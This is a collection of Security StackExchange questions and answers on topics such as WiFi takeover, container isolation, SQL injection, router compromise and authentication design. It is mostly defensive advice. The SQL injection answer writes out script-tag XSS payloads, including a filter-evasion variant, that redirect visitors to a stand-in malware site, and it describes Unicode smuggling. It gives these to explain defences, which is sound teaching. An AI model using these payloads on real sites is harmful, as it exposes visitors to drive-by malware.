{ "source": [ "https://security.stackexchange.com/questions/107546", "https://security.stackexchange.com", "https://security.stackexchange.com/users/10714/" ] }
107,648
Yesterday I found a spam mail in my inbox. I inspected it in order to find out why DSpam and SpamAssassin failed. You can find the raw German mail here ; here's a translation:

"Good Morning. We got to know each other on the website of acquaintances. I want to continue communicating with you, that's why I sent you my picture. I live in RU, the distance is no problem for me. We can communicate us. How old are you? Write me please and send me your photo. I'll be waiting."

The text has poor grammar and lacks any German umlauts. What actually made me wonder was the purpose of the mail. Usually a spammer wants you to click a link or something, probably to infect one's PC or at least verify an active mail address. Why would a spammer want to know my age and have a picture of me?
There was a psychology experiment in which experimenters went door-to-door and asked two groups of homeowners, ironically, to consent to display a large and ugly sign in their yard that said some form of "Keep America beautiful." What distinguished how the two experimental groups were treated was that one group was asked beforehand to agree to display an index card in their front window with the same theme. Almost everybody agreed to display the index card. Agreeing to display the index card had a notable effect. People who were asked up front to display the sign in their yard usually refused (about 30% of them agreed). People who had displayed the index card usually agreed (about 70% of them agreed). The point made in reference to this experiment has been called the " foot in the door effect ." Agree to something little, and you are much more likely to agree to much more. Add in this case that if someone is trusting, and perhaps like many people online a little lonely, sending a picture may not seem too much to ask. And you have a foot in the door opening up to problems much worse than mishandling of the German language.
{ "source": [ "https://security.stackexchange.com/questions/107648", "https://security.stackexchange.com", "https://security.stackexchange.com/users/77472/" ] }
107,753
One of my neighbours hacked the password of my router and he uses my limited internet package. I change the wifi SSID almost daily, but he can hack it easily. Today, he changed the SSID to a hate speech "insult". How can I stop him? I need a quick and powerful solution. Is there any easy-to-use software that protects my wifi? I have an idea but I don't know how to do it. Sometimes my mobile (smart phone) finds a wifi network that does not have a password. So, I can connect to it easily. When I access the internet, all websites are unavailable. And I can not surf any webpage. How to do something like that? Edit: I'm Using WPA/WPA2 PSK
There are two different passwords that access different functions. If an attacker has the admin password, then he or she can change the SSID, WiFi password, and any other settings on the WiFi router.

To fix: ensure your WiFi security setting is WPA or WPA2. Then change the WiFi password to a long one (at least 12 characters, more is better) with special characters and numbers (such as #, $, %, !, 1, 6; see for example Is there any point in using 'strong' passwords? ). Also, make sure the admin password on the WiFi router is changed from the factory default. This admin password is different from the WiFi password. It should also be a long, complicated password, but do NOT make it the same as the WiFi password. The WiFi password is the one you give to friends and family to access your WiFi. The admin password should be kept to yourself only, or to people you REALLY trust, as it can be used to change WiFi settings. Once this is done, change the SSID back to one you like.

Also, make sure to disable the feature called Wi-Fi Protected Setup (WPS). See http://www.howtogeek.com/176124/wi-fi-protected-setup-wps-is-insecure-heres-why-you-should-disable-it/ for details on why WPS is not recommended.

If the attacker is still able to change the SSID and any passwords, your system is more deeply compromised and I would recommend contacting a computer expert or store who can help you clean your system. They can also give you advice on whether there is anything local law enforcement can do, as your attacker is likely committing a crime.
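A quick way to produce the kind of long, random passwords recommended above is to generate them rather than invent them. A minimal Python sketch (my own illustration; the length and character set are assumptions, kept within the 8 to 63 printable ASCII characters that WPA2 passphrases allow):

    import secrets
    import string

    # Letters, digits and a few punctuation marks that most routers accept.
    ALPHABET = string.ascii_letters + string.digits + "!#$%&*+-=?@_"

    def make_passphrase(length: int = 24) -> str:
        """Generate a random passphrase with a cryptographically secure RNG."""
        return "".join(secrets.choice(ALPHABET) for _ in range(length))

    print("WiFi passphrase :", make_passphrase())
    print("Admin password  :", make_passphrase())  # keep this different from the WiFi one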
{ "source": [ "https://security.stackexchange.com/questions/107753", "https://security.stackexchange.com", "https://security.stackexchange.com/users/94156/" ] }
107,811
I just started reading about cookies and all the ways I can get them wrong and allow cookies to be hijacked which allows attackers to do things like impersonate a logged in user. I don't understand why this can't be solved by simply having the server add to each cookie a signature determined by the rest of the cookie, a secret key on the server, and the IP of whoever is making the request. Stolen cookies would then be mostly useless for anyone who can't receive a response at that IP. Any readable data in a stolen cookie itself could still be accessed but stolen cookies couldn't be used to impersonate someone else. Why doesn't this work? Is there some way to receive packets bound for an IP address that you don't control? I know that on my local network I can read packets meant for other computers on my local network but I don't think there's any way to send a copy of all the packets meant for stackoverflow.com to my residential IP. If this was our only means of security you could still send spoofed requests but you couldn't trick the server into sending anything back to your own IP (I think) which still seems useful. I didn't find anything about associating cookies with IPs on google so I figure this doesn't work but I don't know why.
If the cookie gets stolen inside a public WiFi hotspot, all users of the hotspot usually have the same public IP address. This means binding to an IP would not help against an attacker in the same local network. Apart from that, if the user's public IP changes, as is the case when moving between networks (mobile, WLAN at university, WLAN at a cafe, WLAN at home...), they would need to log in again and again.
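For reference, here is a minimal Python sketch of the IP-bound signed cookie the question proposes (an illustration of the idea, not an endorsement). It also makes the objection above concrete: the moment the client's public IP changes, verification fails and the user is forced to log in again.

    import hashlib
    import hmac

    SERVER_SECRET = b"example-secret-key"   # placeholder; a real server would use a random key

    def sign(payload: str, client_ip: str) -> str:
        mac = hmac.new(SERVER_SECRET, f"{payload}|{client_ip}".encode(), hashlib.sha256)
        return f"{payload}|{mac.hexdigest()}"

    def verify(cookie: str, client_ip: str) -> bool:
        payload, _, mac = cookie.rpartition("|")
        expected = hmac.new(SERVER_SECRET, f"{payload}|{client_ip}".encode(), hashlib.sha256)
        return hmac.compare_digest(mac, expected.hexdigest())

    cookie = sign("user=42;expires=1700000000", "203.0.113.7")
    print(verify(cookie, "203.0.113.7"))   # True:  same IP, signature checks out
    print(verify(cookie, "198.51.100.9"))  # False: IP changed, the user is logged out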
{ "source": [ "https://security.stackexchange.com/questions/107811", "https://security.stackexchange.com", "https://security.stackexchange.com/users/45880/" ] }
107,850
I have created a web application that among other things allows users to write, compile and execute code (Java, C#). The application creates a Docker container for every user where compilation and code execution takes place. I have taken the following measures to secure the container: This container has no persistent or shared data. It does not have access to the docker API (which is secured with TLS). There is no information within the container the user shouldn't know about. The user will not be aware that the compiler is within a container. Can I consider this container safe to run untrusted code in? Are there any known ways to affect the host machine from within the container in a configuration like this?
tl;dr: container solutions do not, and never will, guarantee complete isolation; use virtualization instead if you require this.

Bottom-up and top-down approaches

Docker (and the same applies to similar container solutions) does not guarantee complete isolation and should not be confused with virtualization. Isolation of containers is achieved by adding some barriers in-between them, but they still use shared resources such as the kernel. Virtualization, on the other hand, has much smaller shared resources, which are easier to understand and well-tested by now, often enriched by hardware features to restrict access. Docker itself describes this in their Docker security article:

"One primary risk with running Docker containers is that the default set of capabilities and mounts given to a container may provide incomplete isolation, either independently, or when used in combination with kernel vulnerabilities."

Consider virtualization as a top-down approach

For virtualization, you start with pretty much complete isolation and provide some well-guarded, well-described interfaces; this means you can be rather sure breaking out of a virtual machine is hard. The kernel is not shared: if you have some kernel exploit allowing you to escape from user restrictions, the hypervisor is still in-between you and other virtual machines. This does not imply perfect isolation. Again and again, hypervisor issues are found, but most of them are very complicated attacks with limited scope that are hard to perform (though there are also very critical, "easy to exploit" ones).

Containers, on the other hand, are bottom-up

With containers, you start from running applications on the same kernel, but add barriers (kernel namespaces, cgroups, ...) to better isolate them. While this provides some advantages, such as lower overhead, it is much more difficult to "be sure" you have not forgotten anything; the Linux kernel is a very large and complex piece of software. And the kernel itself is still shared: if there is an exploit in the kernel, chances are high you can escape to the host (and/or other containers).

Users inside and outside containers

Especially pre-Docker 1.9 (which should get user namespaces), this pretty much means "container root also has host root privileges" as soon as another missing barrier in the Docker machine (or a kernel exploit) is found. There have been such issues before , you should expect more to come, and Docker recommends that you take care to run your processes inside the containers as non-privileged users (i.e., non-root). If you're interested in more details, estep posted a good article on http://integratedcode.us explaining user namespaces .

Restricting root access (for example, by enforcing a non-privileged user when creating the image, or at least using the new user namespaces) is a necessary and basic security measure for providing isolation, and might give satisfying isolation in-between containers. Using restricted users and user namespaces, escaping to the host gets much harder, but you still shouldn't be sure there isn't just another way, not considered yet, to break out of a container (possibly involving an unpatched security issue in the kernel), so containers alone shouldn't be relied upon to run untrusted code.
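To make the "non-privileged user plus stripped-down container" advice concrete, here is a hypothetical sketch using the Docker SDK for Python (assumptions: the docker Python package is installed, and the image name, command and limits are placeholders). It is one possible hardening baseline, not a guarantee of isolation, for the reasons given above.

    import docker

    client = docker.from_env()

    # Placeholders: image name and compile command depend on your setup.
    logs = client.containers.run(
        image="sandbox-jdk:latest",
        command=["javac", "Main.java"],
        user="1000:1000",                     # never run the untrusted code as root
        network_disabled=True,                # no network access from inside the container
        read_only=True,                       # read-only root filesystem...
        tmpfs={"/work": "size=64m"},          # ...with a small writable scratch area
        working_dir="/work",
        cap_drop=["ALL"],                     # drop every Linux capability
        security_opt=["no-new-privileges"],
        mem_limit="256m",                     # resource limits to contain abuse
        pids_limit=64,
        remove=True,
    )
    print(logs.decode())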
{ "source": [ "https://security.stackexchange.com/questions/107850", "https://security.stackexchange.com", "https://security.stackexchange.com/users/94278/" ] }
107,852
Sometimes, security best practices protect you against attacks that are very improbable. In these scenarios, how do you defend the implementation of such security measures? For example, password-protecting access to the BIOS of a thinclient. A BIOS without a password is a risk because an attacker with physical access can change BIOS configuration in order to boot from USB and access the data of the system without authentication. In this case, the attacker needs physical access, the thinclient does not store too much important information, etc. The risk is very low. Other examples may be related to some measures when you harden systems. In this case, is it better to not enforce this security measure to be reasonable with the rest of the company or you are opening little holes that will punch you in the face in the future?
The potential impact of this is not low, regardless of how much information the thin client stores. Specifically, the risk is that an attacker installs something like a rootkit or software keylogger in the operating system of the thin client, which you are unlikely to be able to discover by inspection. (This is a variant of the Evil Maid attack.) Should any administrator ever use that client in the future, it will be game over for the network. The thin client can also be used as a beachhead to launch further attacks against the network, or to conduct reconnaissance. Protecting the BIOS prevents this from happening, by protecting the integrity of the thin client OS. The wider lesson here: best practice saves you the expense and difficulty of assessing every risk, which, as this question demonstrates, is hard to do.
{ "source": [ "https://security.stackexchange.com/questions/107852", "https://security.stackexchange.com", "https://security.stackexchange.com/users/91253/" ] }
107,887
Once a *nix system is properly configured and hardened, is it a conceivable strategy to remove all super user/root users? Are there benefits to removing root from a system altogether to prevent super-user privilege escalation exploits altogether? Edit: More to the point: Can super user (root, uid=0 or otherwise) be replaced entirely with a capability based system?
Even if you wanted to, I don't think you can remove the root user. From Wikipedia :

"On Unix-like systems, for example, the user with a user identifier (UID) of zero is the superuser, regardless of the name of that account."

and a lot of the kernel code that vulnerabilities exploit does stuff like

    // become root
    uid = 0;
    ...
    if (uid == 0)
        // do some protected thing

So the superuser isn't really a "user account", it's literally the number 0. If you can find an exploit to set uid = 0 then bam! your process has sudo , regardless of whether or not there's a user account named "root".

EDIT ADDRESSING COMMENTS: several flavours of Linux prepend a "!" to the root password in the /etc/shadow password file (a character that cannot be generated by the password hashing function), which makes it impossible to actually log in as root. That stops some types of root-privilege escalation attacks based on cracking the root password, but the more dangerous kinds of privilege escalation are based on buffer-overflow attacks that overwrite a process's uid variable to be uid=0 , at which point that process is root .
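As a small illustration of the "!" convention mentioned in the edit, the following Python sketch (hypothetical, and it must run as root since /etc/shadow is not world-readable) classifies root's password field; a leading "!" or "*" conventionally marks a locked account:

    def root_password_status(shadow_path: str = "/etc/shadow") -> str:
        """Roughly classify root's password field in /etc/shadow (needs root to read it)."""
        with open(shadow_path) as f:
            for line in f:
                fields = line.rstrip("\n").split(":")
                if len(fields) < 2 or fields[0] != "root":
                    continue
                pw_field = fields[1]
                if pw_field.startswith(("!", "*")):
                    return "locked: direct password login as root is disabled"
                if pw_field == "":
                    return "empty: no password required (dangerous)"
                return "a hash is set: root password login is possible"
        return "no root entry found"

    if __name__ == "__main__":
        print("root account:", root_password_status())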
{ "source": [ "https://security.stackexchange.com/questions/107887", "https://security.stackexchange.com", "https://security.stackexchange.com/users/91764/" ] }
108,028
Let's say I operate a website where you can create cat pictures. I give every cat picture a unique identifier so that it can be shared on social media with http://catpictures.com/base62Identifier . I could give the cat pictures sequential identifiers such as 1,2,3, etc, but then it would be possible to easily discover how many new cat pictures the users create per day (by the largest identifier that returns HTTP 200 each day). This exposes me to the common strategy of ordering a product from your competitors once a month and noting the invoice number. Website traffic figures are well-correlated to business revenue so I obviously want to keep this information secret. What I'm considering trying: This sounds like a job for a hashing algorithm, right? The trouble is by observing a hash it's pretty easy to tell which algorithm created it (md5, crc32, etc). Someone with a rainbow table would make short work of that idea. I could salt the identifier [hash("salt"+1), hash("salt"+2), ...], but would then have to worry about the security associated with the salt. And collision checking. Another idea I had was to generate a random string of characters and use that as the cat picture's primary key in the database (or just I could hash the first n bits of the cat picture data). This way I would only have to check for collisions. Is there a standard, best-practice way avoiding exposing your traffic volumes through your unique identifier URLs? Edit: I'm specifically looking for a solution that is a good combination of security and suitability as a database primary key or indexable column.
The standard approach to this kind of issue is to create a UUID (Universally Unique Identifier) for each picture. This is generally a random 128-bit identifier which you can assign to each picture without any particular concern that it would be possible to enumerate the pictures via a brute-force attack on the namespace. For example in .NET you can use the GUID structure for this kind of purpose. Since Windows 2000 ( source ), Guid.NewGuid generates random (version 4) UUID. (Ancient versions generated a version 1 UUID which reveals the date when it was generated, doing nothing to protect you from the "invoice number" problem.)
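The same idea as a rough Python sketch (the .NET GUID approach above is the original; this is just an equivalent illustration, and the catpictures.com URL is the question's own example). A 128-bit random identifier makes enumeration, and therefore traffic inference, impractical, and either form works as a database key:

    import uuid
    import secrets

    # Option 1: a standard version-4 UUID (122 random bits), fine as a primary key.
    picture_id = uuid.uuid4()
    print(str(picture_id))

    # Option 2: a shorter, URL-friendly random token (16 random bytes).
    slug = secrets.token_urlsafe(16)
    print(f"https://catpictures.com/{slug}")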
{ "source": [ "https://security.stackexchange.com/questions/108028", "https://security.stackexchange.com", "https://security.stackexchange.com/users/63796/" ] }
108,055
Edit: This scheme has since been standardised as WebAuthn - go use that instead!

I have a userbase which really isn't all that inclined to create a secure password for a website. They're also almost entirely on mobile devices, so I would like to try something a little different rather than have them type 'password1' and just wait for it to get guessed. So, firstly, some assumptions:

- Web browsers almost always remember the password for you anyway.
- Mobile devices are increasingly gaining features which identify a particular user more securely (touch ID, for example).
- This uses HTTPS; malicious clients (intercepting) are largely a non-issue.

The resulting implication: the website authenticates the device and the device authenticates the user. Therefore, we might as well use something better than a poorly chosen password for website <-> device. Given this, the intention is to use a client-generated key pair. The most similar thing asked before is Using RSA for Web Application Authentication , however this approach appears to be a little different. So, the protocol itself.

Firstly, the join process:

1. The client generates an RSA key pair. The public key is sent to the server (over HTTPS). This only ever happens once per device.
2. The server stores the public key as a device.
3. The server creates an account and relates the device to the account. [A]
4. The first session token along with the new device ID is encrypted using the public key, and the result is sent back to the client. The device ID is both a number and a randomly generated string.
5. The client decrypts it, stores the device ID and the private key, and sets the IP-locked session token as its cookie. All further requests are authenticated using the session token.

Login (typically due to a changed IP):

1. The client tells the server which device it is by sending the device ID.
2. The server asks the client to prove it by encrypting the new session token with its stored public key of that device, and sending it.
3. The client decrypts the data and sets the session as its cookie. Provided it really is who it said it was, the session is now valid.

Adding a device to an account (e.g. a new phone to replace the one you just washed):

1. The device gets a device ID for itself by doing a join similar to the above, but does not create an account; [A] does not occur. The device is currently able to authenticate but is not associated with any account. (And this association is purely at the server end.)
2. Enter your email address (or some other account-related information such as a username) on the new device.
3. The server identifies the requested account and sends it an email or SMS containing a link.
4. The user loads the link (on any device). This causes the server to relate the new device to the original account, provided it's within e.g. 24 hours.

Known vulnerabilities (the following vulnerabilities all also relate to your typical password system):

- It's as strong as the email account / SMS receiver etc.
- SSLStrip and XSS being used to grab the stored private key, in the same way they could grab document.cookie or the autofilled user/password fields. Although the whole site is HTTPS only, there may be some unknown exploit in the surrounding infrastructure.
- Someone else could grab the physical device and use the site.

Benefits over a password system:

- The 'password' is private, even from the server, helping against data leaks and MITM.
- The 'password' text is considerably stronger, as it's essentially equivalent to one in the region of 300-500 characters long.
- The server only contains a list of public keys. Someone gaining this list via a data leak would still have to break RSA.
- It's unphishable, as the user never directly enters a password.
- If an intruder breaks HTTPS, i.e. by going around it with something like SSLStrip, they'd still have to break the password as it's not then on the wire as clear text.
- Actually simpler to use; the user simply enters, at a minimum, an email address.

Given this, my assumption is that such a system may provide more security and simplicity than a password one can. However, why is this not being done, and should it be done; am I missing something? Or should I stick to the mainstream password setup and just live with it - any responses would be greatly appreciated!

Side notes: I'm aware of client certificates, which this has parallels to, but they seem to use complicated terminology and UX for a user to understand, thus they don't get used all that much. On a similar thread, it may make a user feel odd not using a password; it may be perceived to be less secure. (?) Provided the technique is sound and the 'perception issue' isn't a concern, I intend to open-source the implemented solution for both greater security and simplicity on the web, with a corresponding full audit of the implementation.
{ "source": [ "https://security.stackexchange.com/questions/108055", "https://security.stackexchange.com", "https://security.stackexchange.com/users/94449/" ] }
108,104
I live in a country with little freedom on the Internet (not as strict as in China, but some sites, particularly anti-government sites, are inaccessible without a VPN). Recently the government went around collecting the Wi-Fi names of every house. I had to fill in my name, my address and my Wi-Fi name. I didn't have to provide the password. Every house needed to fill in the survey. They refused to give the reason. My questions are:

1. Why would they do that? If I can change my Wi-Fi name, or even the modem, whenever I want, then why would they do that?
2. Should I do that right now? To my knowledge*, once the password has been compromised, setting a new password on the same modem won't help. However, I'm not sure what they can do once they have gained access to my modem. Can they open a backdoor or something?

*I used to install Kali to break Wi-Fi passwords for fun, but unfortunately I didn't pass the first test of the tutorial. :( After I found out that all tutorials only give part of the solution, I was too lazy to try again.
I see two possible uses of such information from a government perspective. Neither of them involves the password or actually using your WiFi access.

Forensic analysis: connected devices store a history of the access points they were connected to, sometimes associated with "last seen" dates. Using this history, it is therefore possible to know where someone was and when, which can be very helpful for investigators. Concrete example: someone is arrested, his cellphone and laptops are seized for investigation, and their WiFi history is analysed (actually, in some cases, with some devices being a bit too talkative, it is not even necessary to seize the device, but let's stay on topic). This will reveal where the suspect has been and when (for the last time at least), and because we are talking about associated access points it strongly suggests some sort of relationship between the suspect and the AP owner (you do not distribute your WiFi password to just any strangers, do you?), helping to construct a map of the suspect's relationships (this is where the ability to associate an SSID (the WiFi name) with an owner's name shows its full importance).

Geolocation: if by any means investigators can remotely access the list of the access points covering the area where a device is currently located, then it is possible to determine where the device (and most likely its bearer too) is located. Concrete example: an implant (to borrow NSA's terminology) is installed on a device with Internet but no GPS capability (laptop, tablet, etc.), or where the user has disabled GPS geolocation for privacy purposes. The implant phones home on a regular basis, sending a list of currently visible WiFi networks with the associated signal strength (the device doesn't need to be associated to any of them). Combined with a map of SSID geographical locations, this effectively allows the suspect's movements to be tracked in real time. In this case, however, collecting the owner's name through such visible actions is less necessary; war drivers and other Google cars know this very well. However, depending on the details of this procedure, it may also limit people's ability to freely change their WiFi SSID name (say the form forbids this: it would be trivial for the authorities to detect undeclared changes and associate them with a name), thus possibly providing more accurate information in the long term.

And yes, technically you could change your WiFi "name" any time you want; however, it is possible that your government may require you to fill in a form to officially declare this change (or they may just assume that only a minority of users will do this, so it is not worth tracking such changes).

Regarding your mention of the WiFi password: as long as the WiFi access was hacked by finding the password and not due to another, unrelated weakness, and unless the attacker also hacked the access point itself (and replaced its firmware, for instance), then changing the password to a stronger one is sufficient to block any further exploitation of this access.

Regarding what can be done using a compromised access point, this is worth a separate question, but you may already find a lot of information in existing posts on this site (basically, an attacker would gain a man-in-the-middle (MITM) position to intercept/modify all of your communication; this also opens opportunities to attack other devices on your internal network, and depending on the device's reset abilities the attacker could also prevent the access point firmware from being cleaned, effectively requiring the device to be replaced).
{ "source": [ "https://security.stackexchange.com/questions/108104", "https://security.stackexchange.com", "https://security.stackexchange.com/users/94500/" ] }
108,191
Entering my email at https://haveibeenpwned.com/ , I was told that I have been pwned. I am in http://pastebin.com/SCLNRHJQ

I already tried:

- to find out my password by simply md5-hashing all the passwords I could think of and comparing them to the hash in pass;
- to check whether someone could easily crack my password by putting the hash into some online md5 "rainbow table service" myself;
- to find the breached web site by searching my mail for registration notifications received on the registration date given in joined_on;
- to find email received from any mail address in the list;
- to send an email to the first in the list, asking him whether he knows which site it is and/or whether he possibly is the owner of that site.

All of these loose ends came up blank. I could only deduce that it has to be a really small LEGO-themed website, but that's it. So I have changed all the passwords of my most-used accounts, especially the email accounts. The many old and sleeping accounts I don't even know that I have are out of reach. What else can I do?
The first rule is to clean up your act: use a password manager, have a unique, long and random password for EACH and EVERY one of your important services (email, Google, etc.) and change all your passwords. Then check whether there are any mysterious transactions on your accounts (not just bank accounts, mind you: anything that could be accessed using the email that was compromised). That should give you a good indication of whether the possible risk of being breached was actually realized. Finally, take each possibly compromised account and think about how it could lead to a continuing issue: could some information extracted from that account be used in the future? If yes, is there any action you might take to reduce the consequences? Is the risk you're running worth the price you're going to pay to mitigate it? If you can't mitigate it, can you insure against it? Is it even worth insuring?
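As a practical complement to the cleanup advice above, you can also check whether any of your candidate passwords appear in known breach corpora without sending the password itself anywhere, via the k-anonymity range endpoint of the Pwned Passwords service. A minimal Python sketch (the endpoint URL and response format are assumptions based on the service's public documentation at the time of writing, so verify them before relying on this):

    import hashlib
    import urllib.request

    def pwned_count(password: str) -> int:
        """Return how many times a password appears in the Pwned Passwords corpus (0 = not found)."""
        sha1 = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
        prefix, suffix = sha1[:5], sha1[5:]
        # Only the first 5 hex characters of the hash ever leave your machine (k-anonymity).
        with urllib.request.urlopen(f"https://api.pwnedpasswords.com/range/{prefix}") as resp:
            for line in resp.read().decode("utf-8").splitlines():
                candidate, _, count = line.partition(":")
                if candidate.strip() == suffix:
                    return int(count.strip())
        return 0

    print(pwned_count("correct horse battery staple"))

A non-zero count means that exact password is already circulating in cracked-password lists and should never be reused anywhere.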
{ "source": [ "https://security.stackexchange.com/questions/108191", "https://security.stackexchange.com", "https://security.stackexchange.com/users/37853/" ] }
108,310
I have to make a website for an NGO (Non-Governmental Organization), and they have the minimal plan from their provider, so they can't have SSL/TLS (essentially just HTML/PHP/MySQL/JS). The data that goes to and from the server isn't very sensitive, but I don't want their passwords, names and addresses to be sent in the clear over the web. I thought about encrypting data with RSA inside the JavaScript that calls the API functions (I'm no expert, but this lib seems pretty efficient), but I read an article that strongly advises against using JavaScript for crypto (I'm French and maybe I didn't get everything right, but I got the main point). So what should I use to encrypt the data over the network? If JS isn't really a bad idea, what can I do to ensure maximum safety with the technology I can use on this server (once again, no HTTPS, sadly), apart from hosting the lib on my server rather than importing it from a different server?
No SSL, no security. Things in the real world are rarely that simple, but here they are. This is easily seen as follows: whatever you do in JavaScript will be done in JavaScript sent by the server. Any attacker who is in a position to look at the data can also modify it at will (e.g. the easiest way to spy on WiFi is to run your own fake access point, and then you naturally get to modify all data as it comes and goes); thus, such an attacker can simply remove or alter whatever JavaScript-based solution you may come up with, and deactivate it. Or just add a hook to also send the password in the clear as an extra parameter. Now, even if you could get "safe JavaScript" into the client browser, you would then run into all the problems that JavaScript crypto entails, which are detailed in the article you link to. But this is only a secondary consideration compared with the fundamental flaw explained above: with no SSL, you cannot ensure that what runs in the client browser is your code. Trying to handle passwords securely on a non-SSL web site is akin to trying to perform brain surgery safely with only a teaspoon and a rusty crowbar. Just don't do it. If there is sensitive data that flows to the web site (e.g. names and addresses), then you MUST apply reasonable protection mechanisms. If the data is not sensitive, then why would you need passwords?
{ "source": [ "https://security.stackexchange.com/questions/108310", "https://security.stackexchange.com", "https://security.stackexchange.com/users/69673/" ] }
108,428
I just read a few articles about a new Grub vulnerability. The articles say that you can bypass the password protection by pressing backspace twenty-eight times. I am a security guy and I am concerned about the vulnerability, so I would like to know what measures GNU/Linux distributions are taking. Is there a security update/fix/patch, and can I do anything myself to keep my computer secure? I always keep my OS, web browser, and programs up to date, so will that help? Here are the articles: The Hacker News Lifehacker
The main thing that is happening is that the bug is being seriously overhyped. Exploiting this vulnerability requires physical access to the computer during startup, and if you've got physical access, there are about a zillion ways you can bypass security. The bug is about bypassing Grub2's internal password protection. Most users don't password-protect Grub2. The bug is in the Grub2 bootloader. If you're using direct boot from UEFI, LILO, classic Grub, or any of the non-x86 bootloaders, you're not vulnerable to it. If you're worried about this bug, install your distro's patch for it, but keep in mind that, except in unusual circumstances, the vulnerability doesn't actually reduce security.
{ "source": [ "https://security.stackexchange.com/questions/108428", "https://security.stackexchange.com", "https://security.stackexchange.com/users/94833/" ] }
108,472
I know some developers double up apostrophes to mitigate SQLi (that is, when the input is ' it becomes ''). Is there a way to beat this? This is on MS SQL Server.
I try to show both sides of the security spectrum. Security is important, so you shouldn't just know how to defeat security, you should know how to implement it as well. Thus, I'm going to cover prevention first. If you don't want to read this, scroll down.

How do I prevent SQL injection?

Doubling up apostrophes is not the answer when it comes to security, and it can lead to insecurity. The answer depends on the programming language you're using. For SQL Server / Oracle / MySQL: with Java, use CallableStatements and PreparedStatements correctly; with PHP, you'll need the appropriate Prepared Statements; with C#/VB.NET, you'll need parameterized queries. Note that these are all the same concept in every language, they just have different names. Even with prepared/callable statements or parameterized queries, the following is incorrect:

    // Bad code, don't use
    string sqlString = "SELECT * FROM [table] WHERE [col] = '" + something + "' AND [col2] = @Param";

You must never concatenate your SQL variables. With SQL Server, depending on your language of choice, your query should look something like this:

C#

    using (SqlCommand command = new SqlCommand("SELECT * FROM [tab] WHERE LName = @LName", connection))
    {
        // Add a new SqlParameter to the command.
        command.Parameters.Add(new SqlParameter("LName", txtBox.Text));
        // Read in the SELECT results.
        SqlDataReader reader = command.ExecuteReader();
        while (reader.Read())
        {
        }
    }

Java

    Connection con = DriverManager.getConnection("database-connection-string", "name", "pass");
    // Question marks are the bound variables, which are parsed in the defined column order.
    PreparedStatement findLName = con.prepareStatement("SELECT * FROM [tab] WHERE LName = ?");
    // The number is the order in which the question marks appear. You can have more than one
    // in a prepared statement: the first one is "1", the second is "2", and so on.
    findLName.setString(1, Lastname);
    findLName.executeQuery();

PHP: check w3schools for an example, I don't want my answer getting too long.

Note that this still doesn't get rid of potential injection of scripts onto a web page. You could insert exactly what they ask for, within acceptable ranges, and then output the results to HTML. If they insert the following (dumbed-down example):

    <script> window.location.href='hxxp://www.mymalwarewebsite.com/'; </script>

...and you output that result to your page, then you're in big trouble. So what if you remove anything from <script> to </script>? What if they insert:

    <scri<script>pt> window.location.href='hxxp://www.mymalwarewebsite.com/'; </scri<script>pt>

...? If you remove the script tags with a simple replace, you're still stuck with that exploit. What you really want, in addition to the above, is: for C#, HtmlEncode; for Java, the Java Html Sanitizer from OWASP; for PHP, HtmlEntities. For all cases involving unicode parsing, you want to prevent unicode injection.

Shut up, Mark! How do I beat doubling up apostrophes?

You may be able to beat it in different ways; you may be able to force various SQL databases to translate unicode into the local charset. For example, Ā could be converted to A. Even worse: U+02BC, or ʼ, would be translated as ', which is U+0027. This is called Unicode-based Smuggling. Doubling quotes also doesn't work in older versions of MySQL. Although not really an SQL injection attack, you can try to force the website to inject malicious code to display to its users. You can try inserting script tags (read above for an example).
Imagine injecting a drive-by download when people view your page, or a user list. Although not technically an SQL injection attack, you may also be able to beat this protection by looking through the console in your browser, checking for integers being sent to the database, and then modifying the request. This is called a Direct Object Reference exploit, and there are various tools which can do this. Prepared Statements will not protect you against this attack; please read the OWASP article.
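For completeness, here is the same parameterization concept in Python, using the standard-library sqlite3 module purely as an illustration (the placeholder syntax differs between database drivers, so check your driver's documentation):

    import sqlite3

    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (lname TEXT)")
    conn.execute("INSERT INTO users VALUES ('O''Brien')")

    lname = "O'Brien"  # attacker-controlled input, apostrophe and all
    # The driver binds the value separately from the SQL text, so quoting tricks don't apply.
    for row in conn.execute("SELECT * FROM users WHERE lname = ?", (lname,)):
        print(row)

The point is the same as in the C# and Java snippets above: the user-supplied value never becomes part of the SQL text, so there is nothing for doubled (or smuggled) apostrophes to break out of.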
{ "source": [ "https://security.stackexchange.com/questions/108472", "https://security.stackexchange.com", "https://security.stackexchange.com/users/63692/" ] }
108,474
I have the following situation: a user with a USB token certificate accesses a site and logs in using this certificate, and the login process asks for the USB token password; once the user is logged in he can do anything on the site. My objective is to automate this process using a PHP web application, for example. The main question is: how can this USB token certificate be used to log in on the server? Any suggestions?
{ "source": [ "https://security.stackexchange.com/questions/108474", "https://security.stackexchange.com", "https://security.stackexchange.com/users/94834/" ] }
108,653
If you connect a computer that is infected with malware (the government grade, kernel infecting, extremely persistent, easily spreadable kind) to a router or modem, can the router or modem or its firmware be infected in such a way that, when you connect another computer to it, the infection transfers? The two computers are never on the LAN at the same time.
You don't need government-grade malware to do this, and such attacks have actually been carried out for years. Typical SOHO routers are often vulnerable to CSRF and similar attacks, and an attacker can use this to compromise the router, i.e. change critical settings like the DNS servers. This compromise can be executed when you visit a web site. It does not even need to be a "bad" site, since such an attack can be executed from inside embedded advertisements too (malvertising). For an example of such an attack see How millions of DSL modems were hacked in Brazil,... which talks about how attackers compromised millions of routers in Brazil using CSRF attacks. They then changed the DNS settings in the router so that the traffic got diverted to the attacker. With this man-in-the-middle position the attacker could then inject advertisements or malware into the traffic to every computer using this router. These attacks are unfortunately very common today since a large proportion of SOHO routers are insecure. See Website Security – Compromised Website Used To Hack Home Routers for hacking via compromised web sites, or Spam Uses Default Passwords to Hack Routers for similar hacks done via spam mails. As for enterprise-level routers: once you are in (maybe via a backdoor) you effectively own a large network, often with sensitive information inside. By manipulating the routing you can divert the traffic to the attacker and carry out the same attacks as described above, and more. The main difference is that there are far more computers behind the router, and these usually hold more interesting information than you will find in home networks. This means the return on investment for the attacker is usually higher when enterprise routers, or even routers at ISPs, are compromised.
{ "source": [ "https://security.stackexchange.com/questions/108653", "https://security.stackexchange.com", "https://security.stackexchange.com/users/94858/" ] }
108,662
What exactly is the difference between the following two headers: Authorization: Bearer cn389ncoiwuencr vs Authorization: cn389ncoiwuencr ? All the sources I have gone through set the value of the 'Authorization' header to 'Bearer' followed by the actual token. However, I have not been able to understand the significance of it. What if I simply put the token in the Authorization header?
